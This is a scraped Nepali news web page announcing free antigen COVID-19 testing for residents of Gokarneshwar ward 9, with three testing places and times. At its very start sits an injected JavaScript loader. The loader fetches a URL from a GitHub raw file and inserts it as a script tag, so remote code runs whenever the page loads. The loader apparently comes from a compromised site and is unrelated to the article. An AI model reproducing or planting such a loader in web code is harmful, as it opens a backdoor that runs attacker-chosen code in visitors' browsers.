;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोकर्नेश्वोर वडा नं ९ का बासिन्दाहरुको निशुल्क कोरोना परीक्षण हुदै, यी ३ ठाउँमा हुने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • गोकर्नेश्वोर वडा नं ९ का बासिन्दाहरुको निशुल्क कोरोना परीक्षण हुदै, यी ३ ठाउँमा हुने
Breaking News

गोकर्नेश्वोर वडा नं ९ का बासिन्दाहरुको निशुल्क कोरोना परीक्षण हुदै, यी ३ ठाउँमा हुने

जुनेली न्युज, काठमाडौँ – गोकर्नेश्वोर नगरपालिका वडा न ९ का बासिन्दाहरुको एन्टीजेन मार्फत कोरोना परीक्षण गरिने भएको छ | वडा अध्यक्ष राजिब थापाले २० गते  सूचना जारि गरि बैशाख २४ गते परीक्षण गर्ने उल्लेख गर्नु भएको छ |

वडा कार्यालय ११ बजे देखि १२:३० सम्म, बिद्याव्यायाम स्कुलमा १ बजे देखि २:३० सम्म र गिरी गाउँ सुनाखरी टोलमा ३ बजे द्वेखी ४ बजे सम्म कोरोना परीक्षण गरिने छ |

No photo description available.

फेसबुक प्रतिक्रियाहरु